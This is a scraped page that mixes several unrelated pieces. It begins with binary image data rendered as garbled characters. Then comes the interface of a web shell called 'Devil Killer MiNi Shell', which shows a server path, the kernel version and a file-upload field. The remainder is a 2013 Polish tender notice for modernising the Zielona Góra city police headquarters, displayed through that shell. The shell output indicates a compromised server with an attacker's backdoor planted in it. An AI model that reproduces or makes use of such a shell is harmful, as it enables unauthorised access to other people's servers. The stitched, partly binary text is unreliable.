JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130903/175999-N-2013.html

<p class="kh_header"><b>Gorzów Wielkopolski: Przebudowa z modernizacją Komendy Miejskiej Policji w Zielonej Górze</b><br>
<b>Numer ogłoszenia: 175999 - 2013; data zamieszczenia: 03.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Kwiatowa 10, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 95 738 14 41, faks 95 738 14 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubuska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Policja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa z modernizacją Komendy Miejskiej Policji w Zielonej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przebudowa z modernizacją Komendy Miejskiej Policji w Zielonej Górze.
2. KOD CPV: 71220000-6 Usługi projektowania architektonicznego; 71242000-6 Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów; 71000000-8 Usługi architektoniczne, budowlane, inżynieryjne i kontrolne; 71320000-7 - Usługi inżynieryjne w zakresie projektowania; 71321000-4 Usługi inżynierii projektowej dla mechanicznych i elektrycznych instalacji budowlanych; 71321200-6 Usługi projektowania systemów grzewczych; 71322000-1 Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej, 71327000-6 Usługi projektowania konstrukcji nośnych; 45000000 - 7 Roboty budowlane; 45100000 - 8 Przygotowanie terenu pod budowę; 45200000 - 9 Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części, roboty w zakresie inżynierii lądowej i wodnej; 45300000 - 0 Wykonywanie instalacji budowlanych; 45400000 - 1 Wykończeniowe roboty budowlane.
3. ZAKRES NINIEJSZEGO ZAMÓWIENIA PUBLICZNEGO: 
Przedmiotem niniejszego zamówienia jest przebudowa z modernizacją obiektów Komendy Miejskiej Policji w Zielonej Górze. Budynek zlokalizowany jest na działce o nr ewid. 330/2 przy ul. Partyzantów 40 w Zielonej Górze. Właścicielem gruntu jest Skarb Państwa. Władającym w trwałym zarządzie jest Komenda Wojewódzka Policji w Gorzowie Wlkp. w udziale 839/1000 oraz Prokuratura Okręgowa w udziale 161/1000. (na podstawie Decyzji Prezydenta Miasta Zielona Góra G.G. 72283/2181/01/02 z dnia 09.05.2002r. oraz Decyzji nr 23/03 z dnia 20.10.2003r.). W skład zadania wchodzi również rozbiórka budynku magazynu z dachem pokrytym azbestem oraz budowa kojców dla psów z częścią socjalną dla przewodników i niezbędną modernizacją instalacji zewnętrznych - przy ul. Batorego 90 na działce nr 99/3. 
4. SZCZEGÓŁOWY ZAKRES ZAMÓWIENIA:
Zestawienie powierzchni całego budynku KMP:
Zestawienie powierzchni wewnętrznych segmentów:
powierzchnia wewnętrzna segmentu A - 3 924,00 m2; 
powierzchnia wewnętrzna segmentu B - 1 690,68 m2; 
powierzchnia wewnętrzna segmentu C - 2 075,52 m2; 
powierzchnia wewnętrzna segmentu D - 4 572,35 m2; 
powierzchnia wewnętrzna segmentów: - 12 258,55 m2;
wysokość wszystkich kondygnacji - 2,80 m;
wysokość piwnic - 2,60 m.
Zestawienie powierzchni budynku KMP objętej zadaniem:
Powierzchnia użytkowa budynku (bez komunikacji pionowej)	- 6 902,26 m2;
Powierzchnia biurowa budynku - 4 849,15 m2.
- Rozwinięcie pkt 4 niniejszej sekcji Ogłoszenia o zamówieniu zostało zawarte w Szczegółowym zakresie zamówienia stanowiącym zał. nr 1 do Ogłoszenia o zamówieniu. Zał. nr 1 do Ogłoszenia o zamówieniu opublikowany jest na stronie internetowej Zamawiającego: www.lubuska.policja.gov.pl.
5. Szczegółowy opis przedmiotu zamówienia zawiera Specyfikacja Istotnych Warunków Zamówienia (SIWZ) wraz z załącznikami, w tym z opracowaniem pn: -Program funkcjonalno - użytkowy - Przebudowa z modernizacją Komendy Miejskiej Policji w Zielonej Górze-, które zostaną przekazane Wykonawcom zaproszonym do złożenia oferty.
6. Zamawiający zaleca przeprowadzenie przez Wykonawców wizji lokalnej obiektu i jego otoczenia, co w połączeniu z opisem przedmiotu w pełni przedstawi zakres konieczny do przygotowania oferty i wykonania zadania. Kontakt w sprawie wizji lokalnej - Wydział Gospodarki Materiałowo - Technicznej KWP w Gorzowie Wlkp. - tel. 095/7381420 (sekretariat Wydziału GMT), fax: 095/7381455. Koszty dokonania wizji lokalnej poniesie Wykonawca.
7. Dokumentacje projektową należy sporządzić zgodnie z obowiązującymi przepisami prawa, w szczególności zgodnie z wymaganiami:
1) Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2002r. nr 75 poz. 690 z późn. zm.);
2) Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2012r. nr 0 poz. 462 z późn. zm.);
3) Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2012r. nr 0 poz. 462 z późn. zm.);
4) Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2004r. nr 202 poz. 2072 z późn. zm.);
5) Rozporządzeniem Ministra Spraw Wewnętrznych z dnia 04 czerwca 2012r. w sprawie pomieszczeń przeznaczonych dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoi przejściowych, tymczasowych pomieszczeń przejściowych i policyjnych izb dziecka, regulaminu pobytu w tych pomieszczeniach, pokojach i izbach oraz sposobu postępowania z zapisami obrazu z tych pomieszczeń, pokoi i izb (Dz.U. z 2012r. nr 0 poz. 638) (zostanie przekazane Wykonawcom zaproszonym do składania ofert);
oraz zgodnie z: 
6) Programem funkcjonalno - użytkowym pn. - Przebudowa z modernizacją Komendy Miejskiej Policji w Zielonej Górze. - (zostanie przekazany Wykonawcom zaproszonym do składania ofert);
7) Księgą Komend i Komisariatów Polskiej Policji (zostanie przekazana Wykonawcom zaproszonym do składania ofert);
8) Księgą znaku i elementów identyfikacji wizualnej Komend i Komisariatów Policji (zostanie przekazana Wykonawcom zaproszonym do składania ofert);
9) Wytycznymi Komendanta Głównego Policji nr 3/2013 z dnia 30.07.2013r. w sprawie standardów technicznych, funkcjonalnych i użytkowych obowiązujących w obiektach służbowych Policji (zostaną przekazane Wykonawcom zaproszonym do składania ofert).
8. Wymagane są na bieżąco uzgodnienia międzybranżowe projektantów pomiędzy sobą (z wpisem do projektu) oraz z konsultantami Zamawiającego - na etapie projektowania. 
9. Projektanci poszczególnych opracowań przed przystąpieniem do opracowania dokumentacji powinni sporządzić notatki ze szczegółowych uzgodnień z użytkownikami i przedstawicielami Zamawiającego. Notatki te należy załączyć do projektów.
10. Projekty budowlane należy uzgodnić z ZUD (jeżeli dotyczy), pod względem ochrony p.poż, BHP przez instytucje lub rzeczoznawców do tego upoważnionych, pod względem sanitarno - epidem. - przez rzeczoznawcę MSW - na koszt Wykonawcy.
11. Wykonawca uzyska szczegółowe warunki techniczne na odprowadzenie wód deszczowych z projektowanych miejsc postojowych i uzgodnienie Projektu tegoż odwodnienia w Zielonogórskim Przedsiębiorstwie Wodociągów i Kanalizacji w Zielonej Górze (zgodnie ze wstępnymi warunkami z dn. 09.07.2013r.).
12. Wykonawca wykona wymaganą dokumentację budowlaną, wykonawczą i dokumentację  powykonawczą, złoży w imieniu Zamawiającego wnioski i uzyska stosowne pozwolenia wynikające z przepisów prawa budowlanego. Wykonawca będzie brał czynny udział
w wyjaśnianiu ewentualnych uwag do dokumentacji zgłoszonych przez Urząd Miejski
i Zamawiającego.
13. Projektant będzie zobowiązany do sprawowania nadzoru autorskiego w okresie realizacji inwestycji w ramach wynagrodzenia brutto wynikającego z zawartej umowy.
14. Wykonawca odpowiada za szkody spowodowane wadami dokumentacji projektowej. Aprobata Zamawiającego przedstawionej dokumentacji nie będzie miała wpływu na odpowiedzialność Wykonawcy za opracowanie dokumentacji projektowej.
15. Wszelkie koszty związane z realizacją zamówienia, w tym: koszty poniesione na inwentaryzację budowlaną, ewentualne opinie kominiarskie, badania geotechniczne, ewentualne odkrywki, pomiary i ekspertyzy niezbędne do wykonania dokumentacji oraz wszelkie inne opłaty i koszty związane z wykonaniem dokumentacji, wywóz odpadów powstałych w trakcie realizacji robót budowlanych i koszty związane z ich utylizacją oraz koszty zużytych mediów są kosztami Wykonawcy.
16. W ramach wynagrodzenia brutto wynikającego z zawartej umowy, Wykonawca przeniesie na rzecz Zamawiającego wszelkie autorskie prawa majątkowe do dokumentacji projektowej.
17. Przed przystąpieniem do robót należy projekty wykonawcze przedstawić do sprawdzenia i uzgodnienia z upoważnionymi przedstawicielami Zamawiającego.
18. Miejsce realizacji zadania: Komenda Miejska Policji w Zielonej Górze, ul. Partyzantów 40, działka ewid. 330/2; ul. Batorego 90, działka ewid. 99/3. 
Obiekt jest eksploatowany i nie może zostać wyłączony z użytkowania.
19. Przy realizacji zamówienia zastosowanie mają przepisy ustawy Prawo budowlane (tekst jednolity Dz. U. z 2010r. nr 243 poz. 1623 z późn. zm.).
20. W przypadku powstania w trakcie realizacji prac odpadów lub elementów wymagających utylizacji za ich prawidłową, zgodną z obowiązującymi przepisami utylizację jest odpowiedzialny Wykonawca. 
21. Za wyrządzenie ewentualnych szkód w trakcie robót odpowiedzialność ponosi Wykonawca.
22. Wykonawca robót budowlanych będzie musiał posiadać ubezpieczenie OC przez cały czas trwania umowy zawartej w wyniku toczącego się postępowania. Zamawiający wymaga, aby w okresie trwania robót budowlanych Wykonawca posiadał ubezpieczenie (RBM) Ryzyk Budowlano - Montażowych.
23. Wymagany okres gwarancji i rękojmi za wady w wykonaniu zadania - 36 miesięcy od dnia podpisania protokołu końcowego odbioru robót budowlanych. Zapewnienie przez Wykonawcę i na jego koszt konserwacji i przeglądów gwarancyjnych wraz z dostawą niezbędnych do tego urządzeń, części zamiennych, sprzętu oraz elementów eksploatacyjnych wymaganych przez producenta lub dostawcę przez okres 36 m-cy od dnia odbioru końcowego. Zamawiający wymaga, aby wybudowana w ramach przedmiotu zamówienia sieć strukturalna (LAN) wraz z komponentami była objęta min. 25-letną gwarancją producenta, potwierdzoną odpowiednim Certyfikatem.
24. Termin wykonania zamówienia: od dnia zawarcia umowy do 15.12.2014r.
25. Termin płatności: płatność na podstawie faktur częściowych, do 30 dni kalendarzowych od daty dostarczenia prawidłowo wystawionej faktury VAT do siedziby Zamawiającego. 
26. We wszystkich pozycjach opisu przedmiotu zamówienia, w których zostały wskazane nazwy własne, nazwy producentów, znaki towarowe, zapisy te należy rozumieć jako - typu - i oznaczają możliwość zastosowania rozwiązań równoważnych do wskazanych, tzn. o nie gorszych parametrach techniczno - użytkowych od proponowanych przez Zamawiającego. 
Powyższy zapis nie ma zastosowania dla systemów łączności i informatyki, gdzie wymienione w opisie przedmiotu urządzenia stanowią rozbudowę istniejącego już w KMP Zielona Góra węzła sieci OST112. W związku z powyższym, w celu zapewnienia pełnej kompatybilności z istniejącą infrastrukturą, oraz wsparcia dla wszystkich usług uruchomionych w ramach sieci OST112 wyspecyfikowane zostały urządzenia, które jako jedyne są w stanie spełnić te warunki..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1, 71.22.00.00-6, 71.00.00.00-8, 71.32.00.00-7, 71.32.10.00-4, 71.32.12.00-6, 71.32.20.00-1, 71.32.70.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do przetargu Wykonawca (zaproszony do złożenia oferty) zobowiązany będzie do wniesienia wadium w kwocie 100.000,00 zł (słownie: sto tysięcy złotych 00/100). Szczegóły dotyczące sposobu i formy wnoszenia wadium będą zawarte w SIWZ i są zgodne z art. 45 ustawy P.z.p.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący posiadania wiedzy i doświadczenia, jeżeli Wykonawca, poprzez informacje zawarte w złożonych, wymaganych w tym celu dokumentach, wykaże, że: 
a) w okresie ostatnich 5 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał w sposób należyty i zgodny z zasadami sztuki budowlanej przynajmniej 2 (dwie) roboty budowlane w obiekcie użyteczności publicznej o powierzchni użytkowej min. 1.500 m2 (każda), każda o wartości min. 7 mln zł brutto, zrealizowane w 100% (prawidłowo ukończone), przy czym wykonanie min. 1 z tych robót odbyło się na obiekcie czynnym (tj. obiekt użytkowany - eksploatowany);
oraz
b) w okresie ostatnich 3 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał w sposób należyty przynajmniej 2 (dwie) usługi polegające na wykonaniu dokumentacji projektowej budowlanej i wykonawczej dotyczącej robót budowlanych w obiekcie użyteczności publicznej, zrealizowane w 100% (dot. realizacji usług projektowania). 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/Spółka cywilna) powyższy warunek może być spełniony wspólnie przez członków Konsorcjum/ wspólników Spółki cywilnej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca, poprzez informacje zawarte w złożonych, wymaganych w tym celu dokumentach, wykaże, że dysponuje lub będzie dysponował następującymi osobami uczestniczącymi w wykonaniu zamówienia:
a) min. 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno - budowlanej - bez ograniczeń; 
b) min. 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności architektonicznej - bez ograniczeń;
c) min. 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - bez ograniczeń;
d) min. 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - bez ograniczeń;
e) min. 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności telekomunikacyjnej w zakresie telekomunikacji przewodowej wraz z infrastrukturą telekomunikacyjną - bez ograniczeń;
f) min. 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności drogowej - bez ograniczeń;
g) Kierownikiem Budowy posiadającym uprawnienia budowlane w specjalności konstrukcyjno-budowlanej 
w zakresie kierowania robotami budowlanymi - bez ograniczeń;
h) Kierownikiem robót ogólnobudowlanych posiadającym uprawnienia budowlane w specjalności konstrukcyjno-budowlanej w zakresie kierowania robotami budowlanymi - bez ograniczeń;
i) Kierownikiem robót elektrycznych posiadającym uprawnienia budowlane w specjalności instalacyjnej (tzw. elektrycznej) w zakresie sieci, instalacji, urządzeń elektrycznych i elektroenergetycznych - bez ograniczeń;
j) Kierownikiem robót sanitarnych posiadającym uprawnienia budowlane w specjalności instalacyjnej (tzw. sanitarnej) w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych 
i kanalizacyjnych - bez ograniczeń;
k) Kierownikiem robót telekomunikacyjnych posiadającym uprawnienia budowlane w specjalności telekomunikacyjnej w zakresie telekomunikacji przewodowej wraz z infrastrukturą telekomunikacyjną - bez ograniczeń;
l) Kierownikiem robót drogowych posiadającym uprawnienia budowlane w specjalności drogowej w zakresie kierowania robotami budowlanymi - bez ograniczeń.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/Spółka cywilna) powyższy warunek może być spełniony wspólnie przez członków Konsorcjum/ wspólników Spółki cywilnej, z tym że Kierownikiem Budowy musi być przedstawiciel Lidera.
UWAGA! 
1) Ww. osoby (wymienione w pkt. od 2.a do 2.l) powinny posiadać aktualne zaświadczenia o przynależności odpowiednio do Izby Inżynierów Budownictwa lub Izby Architektów.
2) Zamawiający dopuszcza możliwość posiadania wymaganych uprawnień budowlanych przez jedną osobę 
w kilku specjalnościach.
3) Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo budowlane (tekst jednolity Dz.U. z 2010r., nr 243, poz. 1623 z późn. zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 
z 2008r., nr 63, poz. 394). 
4) Zamawiający dopuszcza możliwość udziału podwykonawców w realizacji zadania. Zamawiający zastrzega, iż Wykonawca nie może powierzyć podwykonawcy funkcji Kierownika Budowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący sytuacji ekonomicznej i finansowej, jeżeli Wykonawca, poprzez informacje zawarte w złożonych, wymaganych w tym celu dokumentach, wykaże, że:
a) Wykonawca robót budowlanych posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na wartość min. 10 mln zł;
oraz
b) Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności projektowej.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/ Spółka cywilna) powyższy warunek może być spełniony wspólnie przez członków Konsorcjum/ wspólników Spółki cywilnej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>- Na mocy § 1 ust. 4 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. z 2013 r., nr 0, poz. 231) Zamawiający wymaga uwzględnienia w Wykazie robót budowlanych co najmniej robót budowlanych, o których mowa w pkt II ppkt 2.1) lit. a) WWD, z załączeniem dowodów określających, że roboty te zostały wykonane w sposób należyty oraz wskazujących, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>- Na mocy § 1 ust. 4 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. z 2013 r., nr 0, poz. 231) Zamawiający wymaga uwzględnienia w Wykazie usług co najmniej usług, o których mowa w pkt II ppkt 2.1) lit. b) WWD, z załączeniem dowodów określających, że usługi te zostały wykonane należycie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

